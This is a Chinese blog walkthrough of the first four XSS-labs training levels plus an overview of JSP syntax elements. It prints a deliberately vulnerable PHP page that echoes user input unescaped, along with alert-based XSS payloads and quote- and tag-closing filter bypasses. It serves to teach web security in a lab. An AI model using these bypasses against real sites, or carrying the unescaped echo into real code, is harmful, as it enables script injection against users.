XSS-labs前四关+jsp语法

最新推荐文章于 2024-09-15 23:24:03 发布
最新推荐文章于 2024-09-15 23:24:03 发布
阅读量791 收藏 7
点赞数 14
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80337881/article/details/136544496
版权
本文通过实例探讨了在不同关卡中利用XSS攻击进行payload注入的过程,展示了JavaScript绕过过滤机制以及JSP(JavaServerPages)编程技术,包括JSP指令、表达式、内置对象和防御措施的运用。
摘要由CSDN通过智能技术生成

level one

观察页面源代码和关卡代码我们可以发现,第一关没有任何得过滤所以我们直接插入payload

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>


name=<script>alert('XSS')</script>

level two

首先我们先尝试一下第一关的payload

我们可以发现在这里我们得<script>中的“<"">"被在转换了说明他被过滤掉了,我们可以加上">

提前闭合input标签实现绕过

"><script>alert('XSS');</script>

level three

同样还是输入上一关的代码,发现还是被转义了,所以我们可以尝试js事件来进行绕过 

'onclick ='alert(1)

level four

老样子 

我们发现这一关是“闭合,所以payload为”

"onclick="alert(1)

jsp语法

JSP(JavaServer Pages)是一种基于Java的服务器端编程技术,用于创建动态Web页面。它允许在HTML或XML页面中嵌入Java代码片段(scriptlets)、JSP动作(actions)、JSP指令(directives)、表达式(expressions)和声明(declarations)。以下是JSP的一些基本语法元素:

  1. JSP指令

    • <%@ page ... %>:定义页面依赖属性,比如脚本语言、错误页面、缓存需求等。
    • <%@ include file="relativeURL" %>:包含其他文件。
    • <%@ taglib uri="tagLibraryURI" prefix="prefix" %>:引入标签库。

  2. JSP脚本元素

    • 表达式 (<%= expression %>):将Java表达式的值插入到生成的页面中。
    • 脚本片段 (<% code %>):插入任意有效的JSP和Java代码片段。
    • 声明 (<%! declaration %>):在JSP页面中定义全局变量和方法。这些声明在JSP页面的servlet类的类定义部分。

  3. JSP内置对象

JSP提供了一些内置对象,可以在JSP页面的任何位置直接使用,无需声明。这些对象包括requestresponseoutsessionapplicationconfigpageContextpageexceptionThreadLocal
4. JSP标准标签库 (JSTL)

JSTL提供了一套自定义标签来简化JSP页面的开发。它包括了核心标签库、格式化标签库、XML标签库、SQL标签库和函数标签库等。
5. JSP动作

JSP动作用于在JSP页面中执行特定任务,比如转发请求、包含其他资源、使用JavaBean等。常见的JSP动作有<jsp:forward><jsp:include><jsp:useBean><jsp:setProperty><jsp:getProperty>等。
6. 表达式语言 (EL)

表达式语言是一种简单的语言,用于访问存储在JavaBean、HttpServletRequest、HttpSession和ServletContext等对象中的数据。EL使得JSP页面更易于阅读和维护,因为它减少了在JSP页面中的Java代码量。

例如,使用EL访问请求参数:${param.username}
7. JSP注释

* HTML注释:`<!-- comment -->`,这些注释在浏览器中可见。
* JSP注释:`<%-- comment --%>`,这些注释在浏览器中不可见,且不会被发送到客户端。

 

上秋 7
关注
jsp基本语法xss-labs前四关
2301_80481202的博客
03-07 469
JSP是基于Java Servlet的Web开发技术,由于其所具有的简单易学和跨平台等的特性,使其在各种动态Web程序的设计语言中脱颖而出,它具有一套完整的语法规范,目前已经成为Web开发中的主流选择。还需要注意的是,如果被插入的文件发生了变化,则包含这个文件的JSP文件需要被重新编译。脚本元素是JSP中使用最频繁的元素,通过JSP脚本可以将Java代码嵌入到HTML页面中,所有可执行的Java代码,都可以通过JSP脚本来实现。称为页面指令,用来定义JSP页面的全局属性,该配置会作用于整个JSP页面。
关于jsp初步学习以及xss-labs搭建及部分通关教程
2301_80213927的博客
03-07 643
JSP是一种Java servlet,主要用于实现Java web应用程序的用户界面部分。(9)exception exception 类的对象,代表发生错误的 JSP 页面中对应的异常对象,用于处理 JSP 页面中的异常情况,可用于捕获和处理页面中发生的异常。(8)page 类似于 Java 类中的 this 关键字,代表当前 JSP 页面的实例,可以用于调用页面的方法。JSP 支持九个自动定义的变量,江湖人称隐含对象,它们是在 JSP 页面中自动可用的对象,无需额外的声明或初始化。
xss-labs
2302_80044238的博客
03-23 1061
jsp的全称是java servlet page 它就是java的服务器页面因为它相对于servlet传回数据的方法比较简单Servlet的本质是一个,旨在处理HTTP请求并生成HTTP响应。
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 937
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
SQL注入分级通关(sqli-labs)
魔仙棒棒之主的博客
05-16 1921
SQL注入分级通关
寒假buu刷题记录 序列化与反序列化、XSS注入、UPLOAD-LABS文件上传
qq_62984336的博客
03-02 2648
做题总结 这个假期看了很多师傅的wp,有一些贴在总结里了,希望对大家也有帮助。(如有冒犯请联系我删除) 序列化与反序列化总结 pop链构造POP链的构造_一个打渔的的博客K6uQ5H7^ff(R-CSDN博客_pop链 序列化与反序列化序列化和反序列化的详解_tree_ifconfig的博客-CSDN博客_序列化和反序列化 简述序列化与反序列化 - 寒江独钓人 - 博客园 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 inte
upload-labs学习记录
qq_41260930的博客
11-29 3823
文章目录1. 基础知识1.1. 简介1.2. 原理1.3. 危害1.4. 常见的文件上传的检测方法与绕过策略1.4.1. 客户端1.4.1.1. Javascript检测1.4.1.1.1. 绕过策略(更改数据包内容)1.4.2. 服务端1.4.2.1. MIME类型检测(Content-Type检测)1.4.2.1.1. 绕过策略(更改数据包内容)1.4.2.2. 文件内容检测1.4.2.2.1...
文件上传漏洞——upload-labs(1-10)
Lemon's blog
08-02 2485
前言:文件上传漏洞还有很多知识要学习,这次就通过upload-labs进行学习 第一关 上传有限制,只让上传JPEG或
SQL注入实操三(SQLilabs Less41-65)
wutiangui的博客
08-06 855
到目前为止,我总结了一下出现过的轮子,可以得出一个结论,首先需要知道有几个参数,前面6种都是单参数的,多参数的只能通过报错信息得知,用–+还是#也要看报错情况n可以是1,-1,n’后面可接),select后面看情况设置显示位② ')–+)可选,'可换成"③ ‘) --+()可换成)),(可换成((,‘可换成"④ " --+或’ #或’ --+⑨ ‘||1||’⑩ ‘#或‘–+⑫。
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3174
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
Find-Sec-Bugs 漏洞范例
zhaohonghan的博客
04-03 1万+
Find-Sec-Bugs 漏洞范例 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
跨站脚本攻击(XSS
最新发布
CoffeMilk的博客
09-15 511
XSS(全称:Cross Site Scripting【跨站脚本攻击】),为了避免和CSS(全称:Cascading Style Sheets【层叠样式表】)名称混淆冲突,故改名为:XSS;是一种常见的Web应用程序代码注入安全漏洞之一。攻击者可以利用这种漏洞在网站上注入行恶意代码,用户在不知情的情况下访问这些被注入了恶意代码的网站内容,导致用户自己的账户、会话cookie、键盘输入内容等敏感信息被攻击者盗取,攻击者可以利用这些信息突破网站的访问限制并冒充受害用户进行操作。
XSS跨站脚本攻击及防护
鹿鸣天涯
09-13 1024
存储型XSS:持久性,代码是存储在web服务器中的,比如在个人信息或发表文章等地方插入代码,如果没有过滤或者过滤不严,那么这些代码将存储在服务器中,用户访问该页面的时候触发代码执行。每一个访问特定页面的用户,都会受到攻击。反射型跨站脚本也称作非持久型、参数型跨站脚本、这类型的脚本是最常见的 ,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
Pikachu靶场之XSS
m0_62438849的博客
09-13 858
alert(document.cookie)test
Vue使用query传参Boolean类型,刷新之后转换为String问题
q879936814的博客
09-12 393
要解决这个问题,不能直接Boolean处理,因为如果传入false,那么转换成字符串,Boolean(‘false’)会变成true;做项目时发现第一次进入页面时传参是正常的Boolean类型,刷新之后变成了String,这是浏览器进行的一次强制转换;解决方法:使用JSON.parse处理参数。
easyexcel模板导出并且公式自动计算的方法
weixin_47615289的博客
09-11 452
【代码】easyexcel模板导出并且公式自动计算的方法。
xss-labs第14关
08-18
- *3* [渗透测试之---xss-labs闯关【1-14关】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值